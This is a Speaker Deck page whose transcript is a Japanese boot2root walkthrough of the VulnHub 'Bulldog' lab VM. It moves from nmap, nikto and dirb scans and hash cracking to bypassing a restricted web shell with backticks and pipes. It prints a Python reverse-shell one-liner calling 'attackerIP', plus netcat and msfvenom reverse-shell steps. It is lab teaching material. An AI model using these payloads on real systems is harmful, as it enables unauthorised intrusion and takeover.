Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
boot2root_kalilinux_bulldog
Search
MarkUP
November 02, 2018
0
24
boot2root_kalilinux_bulldog
MarkUP
November 02, 2018
Tweet
Share
More Decks by MarkUP
See All by MarkUP
OwaspZap
markup
0
97
burpsuite_badstore
markup
0
140
boot2root_kalilinux_droopy
markup
0
33
侵入検知のファーストステップ
markup
0
690
Featured
See All Featured
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
122
21k
How to Get Subject Matter Experts Bought In and Actively Contributing to SEO & PR Initiatives.
livdayseo
0
85
AI in Enterprises - Java and Open Source to the Rescue
ivargrimstad
0
1.2k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
10
1.1k
Rebuilding a faster, lazier Slack
samanthasiow
85
9.4k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
31
3.1k
HU Berlin: Industrial-Strength Natural Language Processing with spaCy and Prodigy
inesmontani
PRO
0
260
Java REST API Framework Comparison - PWX 2021
mraible
34
9.2k
Leveraging LLMs for student feedback in introductory data science courses - posit::conf(2025)
minecr
1
200
Music & Morning Musume
bryan
47
7.1k
First, design no harm
axbom
PRO
2
1.1k
Large-scale JavaScript Application Architecture
addyosmani
515
110k
Transcript
サーバ侵入手法 Bulldog
BulldogVM • インストール https://www.vulnhub.com/entry/bulldog-1,211/
Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads
Virtualbox インポート
Virtualbox ネットワーク設定
Virtualbox ネットワーク設定
Virtualbox スナップショット
ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP: pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る
ポートスキャン ①> nmap -A 192.168.99.101 -A:OSの種類やその他詳細なバージョン情報などを取得可能
ポートスキャン
サーバスキャン ①> nikto –h 192.168.99.101 -h:対象のIPアドレスを指定するオプション
サーバスキャン /dev/
ディレクトリスキャン ①> dirb http://192.168.99.101/ /usr/share/wordlists/dirb/ common.txt ディクショナリファイル(/usr/share/wordlists/dirb/common.t xt)を使用してディレクトリのWebサーバー(http://192.168.99. 101/)をスキャンします。 参考:https://tools.kali.org/web-applications/dirb
ディレクトリスキャン /admin/
http(ポート80)へのアクセス ECサイトっぽいが閉鎖中
http(ポート80)へのアクセス ハッキングを受けた的な 事を書いているけど、こ こから特に情報は得れな い。
/dev/ sshが可能であることと、WebShell があることが記載されている。 WebShellでは認証が要求される
/admin/ 管理者画面へアクセス可能 usrnameとpasswordが必要
/dev/ ソース メールアドレスとハッシュ値を取得
ハッシュ値のクラッキング ・オンラインのハッシュクラッキングツールを使用する http://crackhash.com/ https://crackstation.net/ nickとsarahのパスワードが わかった
管理者ページへの認証 管理者ページの認証をnick かsarahのどちらかでログイ ンすると、webshellの利用 条件が整う。
WebShell • webshellへアクセスすると、使用できるコマンドが制限されて いる。
echoコマンド echoコマンドはバック クォートで囲った中身をコ マンドとして実行し、その 結果を出力する。 または、$(…)で囲うことで も実行可能。
「|」パイプ シンプルに「|(パイプ)」で も制限外のコマンドを使用 できることがわかる。
ReverseShell • リバースシェルの仕組み ①攻撃コードを送信 ②攻撃に成功し、被攻撃側が攻撃側に接続を行うよう命令が実行され る ③攻撃側が待ち受けているポートに被攻撃側が接続し、制御が奪われ る 参考: http://www.atmarkit.co.jp/ait/articles/1507/01/news023.html
ReverseShell • python2系がインストールされているサーバなのでpythonのリ バースシェルを使用する。 shell.py 参考: http://pentestmonkey.net/cheat- sheet/shells/reverse-shell-cheat-sheet import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect
(("attackerIP",attackerPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p =subprocess.call(["/bin/sh","-i"]);
ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker
ReverseShell ・リバースシェルの実行 attacker target
(参考)ncコマンド ・port scaning(ポートが空いているか確認) % nc -vz [remotehost] 23 ・port knoking
(ポートを使用してるサービスを確認) % nc [remotehost] 80 ・ファイル転送 (転送先) % nc -lvp 20000 ※標準出力される (転送先) % nc -lvp 20000 > file ※ファイル出力される (転送元) % nc [remotehost] 20000 < file オプション -z ポートスキャニングモード オプション -l リッスンモード オプション -v 情報表示モード オプション -p ポート番号指定
msfvenomを使用したReverseShell metasploitの機能であり、ペイロードジェネレータです。 リバースシェルのペイロードを作成できます。 https://www.offensive-security.com/metasploit-unleashed/ms fvenom/
ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker
Metasploit framework
Metasploit framework ・リバースシェルの実行 attacker target
Metasploit framework
root権限へ昇格
パスワード推測 SUPERultH imatePASH SWORDyouH CANTget SUPERultHimatePASHSWORDyouHCANTget SUPERultimatePASSWORDyouCANTget
権限昇格